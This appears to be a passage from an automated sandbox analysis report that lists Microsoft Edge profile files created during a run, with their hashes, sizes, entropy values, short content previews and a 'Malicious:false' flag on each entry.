                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):7692
                                                                                                                                                                            Entropy (8bit):5.095529185874663
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihnkAsY8bV+FiA66WbTaFIMYWPLMJ:stFSBso0xhUbGix6WbTaTYB
                                                                                                                                                                            MD5:F997E3BD8935ED1230E7FB2CC0DCA8F5
                                                                                                                                                                            SHA1:FAFA0ECBBD24855CAE59F5CFC658394E9A016EDE
                                                                                                                                                                            SHA-256:779913F76BEA79F5FCCFD019A9F7238BF5679C29A0ED83731AD54597C377ECF5
                                                                                                                                                                            SHA-512:9283B843A79E8B6063E9F92B7BF4B5B2B200E664D14196F3110A508D53F98B8C5751E13949BD027B73B38A44722A648ECFE0870E1F6F2D1E3358B22B83944CCD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                            Entropy (8bit):2.8096948641228403
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljl:S85aEFljljljljljljljl
                                                                                                                                                                            MD5:D7D9437445AA960DCEA52FFE772822DC
                                                                                                                                                                            SHA1:C2BBF4AC0732D905D998C4F645FD60F95A675D02
                                                                                                                                                                            SHA-256:4FF49903BEC1197017A35995D5C5FC703CAF9D496467345D783F754B723D21C1
                                                                                                                                                                            SHA-512:335EB1BA85670550ED1E1E4E14EA4B5D14F8306125BF147A42DE4DEF5E5F75F14C422B014414030CF30378C04F748AC875CF056ADDA196511A0B057B3598FE9A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.118891996796223
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:70RM+q2P923oH+TcwtrQMxIFUt8O8uZmw+OCaMVkwO923oH+TcwtrQMFLJ:7n+v4YebCFUt8OP/+OaV5LYebtJ
                                                                                                                                                                            MD5:29FDEC1A0FECCCBF13B6C88A8C7435DD
                                                                                                                                                                            SHA1:A75C17882E52E8FC4CFEA7C653EC4C8179DD9645
                                                                                                                                                                            SHA-256:8DB6C07BA22BBB1EC14FE69D07AAA00E0EDE7397EB3E0BF98C4FF26461EC181F
                                                                                                                                                                            SHA-512:B9E4EF23C317B268F412AAB40A1CD74CDB44AFF73C48082A17EEFEB21483BBD79A830E9522134667CCEA9EEF11A5679F4A4D5E6F94E8FD38A913E495F76DC5D1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.811 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.819 10ac Recovering log #3.2024/12/11-03:39:55.841 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):349
                                                                                                                                                                            Entropy (8bit):5.102394987658359
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Qm4q2P923oH+Tcwt7Uh2ghZIFUt8OQmJZmw+OikwO923oH+Tcwt7Uh2gnLJ:7Qm4v4YebIhHh2FUt8OQmJ/+Oi5LYebs
                                                                                                                                                                            MD5:01511315FCF4B95BB89B60AF4D96116E
                                                                                                                                                                            SHA1:935530334A6490A5469806DFD710CD40E945A127
                                                                                                                                                                            SHA-256:A9364ADF41F9C31ABC578DFFCAAAA13B59B7C5A0216F0C18C2CEF57B55A2EC07
                                                                                                                                                                            SHA-512:3D3F84F43F00463DDBA8C04972906B3B25A218FB3853ECA93387D58F5307EC2788F07802191ED397CF37EA8F51272C4657FFE3D7EF927D60F81C3110FA39F2E8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.282 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/11-03:39:38.282 ee4 Recovering log #3.2024/12/11-03:39:38.283 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):349
                                                                                                                                                                            Entropy (8bit):5.102394987658359
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Qm4q2P923oH+Tcwt7Uh2ghZIFUt8OQmJZmw+OikwO923oH+Tcwt7Uh2gnLJ:7Qm4v4YebIhHh2FUt8OQmJ/+Oi5LYebs
                                                                                                                                                                            MD5:01511315FCF4B95BB89B60AF4D96116E
                                                                                                                                                                            SHA1:935530334A6490A5469806DFD710CD40E945A127
                                                                                                                                                                            SHA-256:A9364ADF41F9C31ABC578DFFCAAAA13B59B7C5A0216F0C18C2CEF57B55A2EC07
                                                                                                                                                                            SHA-512:3D3F84F43F00463DDBA8C04972906B3B25A218FB3853ECA93387D58F5307EC2788F07802191ED397CF37EA8F51272C4657FFE3D7EF927D60F81C3110FA39F2E8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.282 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/11-03:39:38.282 ee4 Recovering log #3.2024/12/11-03:39:38.283 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEfl431tl:/M/xT02z7l
                                                                                                                                                                            MD5:F3F8BC00336A66CCBA46F7E563FECAAF
                                                                                                                                                                            SHA1:663539C01B112A1B2F1C13E6943EE6B40C633CC1
                                                                                                                                                                            SHA-256:21D159763434DF325172749F3033AC1C6B36C68B1CB13CA49AD0215FD69AAAA3
                                                                                                                                                                            SHA-512:A47EB71C6C728E722D86E21308983D66A56FE4F707A38A56A2A5CDCD9B9B2B2EFBD62EE8CE039DF073904B02C812BF4F112A0E5DCCE4C00D5DCDD1C234A7CE7E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                            Entropy (8bit):5.225216471612671
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7x+v4YebvqBQFUt8OY/+OqiV5LYebvqBvJ:7G4YebvZg8O4qELYebvk
                                                                                                                                                                            MD5:5F518E367271FD6D0662AE80267CBCF6
                                                                                                                                                                            SHA1:1DEF69E2C11723625A7A1141B11DA608036FF162
                                                                                                                                                                            SHA-256:07F6CD8AFD164F10E4819E3741440649CBC5072E7FBB4B3146723270EAEFB705
                                                                                                                                                                            SHA-512:8460BB4890B574261E0C42E050A657996E4CB6FF24C925F3B358E6CC349617D7DFE55C8688F3D3E3F8B1FC000BDB5D2D1221B36A97F68B23228B03AE06F11426
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.565 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.566 10ac Recovering log #3.2024/12/11-03:39:39.569 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                            Entropy (8bit):5.225216471612671
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7x+v4YebvqBQFUt8OY/+OqiV5LYebvqBvJ:7G4YebvZg8O4qELYebvk
                                                                                                                                                                            MD5:5F518E367271FD6D0662AE80267CBCF6
                                                                                                                                                                            SHA1:1DEF69E2C11723625A7A1141B11DA608036FF162
                                                                                                                                                                            SHA-256:07F6CD8AFD164F10E4819E3741440649CBC5072E7FBB4B3146723270EAEFB705
                                                                                                                                                                            SHA-512:8460BB4890B574261E0C42E050A657996E4CB6FF24C925F3B358E6CC349617D7DFE55C8688F3D3E3F8B1FC000BDB5D2D1221B36A97F68B23228B03AE06F11426
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.565 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.566 10ac Recovering log #3.2024/12/11-03:39:39.569 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                            Entropy (8bit):0.3886039372934488
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80
                                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):422
                                                                                                                                                                            Entropy (8bit):5.2385261366112195
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7iN+v4YebvqBZFUt8Ouu/+OqqV5LYebvqBaJ:7D4Yebvyg8OuetLYebvL
                                                                                                                                                                            MD5:051F4D567CD36EC397CC735B4BBD745C
                                                                                                                                                                            SHA1:640F3FA7269EFCBEEE0E48058CE17AA73CD5C839
                                                                                                                                                                            SHA-256:9CB033855DB571376FBF9F4D3E10912DD3485DDAA9C9DDBA60DD3E6D15C6BABE
                                                                                                                                                                            SHA-512:25E413AE5797E193153DFFFF5C7D2A2D2E0B0E7BC55D04E5EC1416AFFFE75FC16BBBA6BB70CC3B6643C3738E2A9D9DDF980829E772E9C05CFF09746CBFB17C9E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.892 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.893 10ac Recovering log #3.2024/12/11-03:39:55.897 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                            Entropy (8bit):5.201117771657053
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Oo9+q2P923oH+TcwtpIFUt8ORWrNJZmw+ORWrN9VkwO923oH+Tcwta/WLJ:7OXv4YebmFUt8OwrX/+OwrF5LYebaUJ
                                                                                                                                                                            MD5:9A1F68782675BDA0DB1E8B6D9A426F54
                                                                                                                                                                            SHA1:FE113A5DB042A06925FB80C14F5E5263219AB22C
                                                                                                                                                                            SHA-256:0D96C61542839154CBD8638387309712B6E21BC6D1371637FA945B286654CD0A
                                                                                                                                                                            SHA-512:FC1A3F2EDCB58E565E392A5488F2A099708540578F70566B9DAD33A920914D311D99D189F6F45F39C45C07B4C25AF16BCC46D4209F51162D18871DEA13A29806
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.363 13d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/11-03:39:38.364 13d8 Recovering log #3.2024/12/11-03:39:38.364 13d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):196608
                                                                                                                                                                            Entropy (8bit):1.1220878973775341
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:384:KdM2qOB1nxCkTSAELyKOMq+8yC8F/YfU5m+OlT:Kvq+n0I9ELyKOMq+8y9/Ow
                                                                                                                                                                            MD5:609B497EE21C071513ED99128FD7BBA5
                                                                                                                                                                            SHA1:A6C6FCD5CF1EC5D9584335BE994ABADC2FA6705D
                                                                                                                                                                            SHA-256:8B1566190776285A27BFA5342B1BD0CF0DD4C0B80FD6DF30892A5519E20AA647
                                                                                                                                                                            SHA-512:C0EBE69DC37944F482A736DB622432DBC3C37464B85AE5881AB61570E81381E6C0A1210BA0EB0D2D2482145BF5FD479C47FA21DDC6CC4E88753438FD43326846
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):11755
                                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                                            Malicious:false
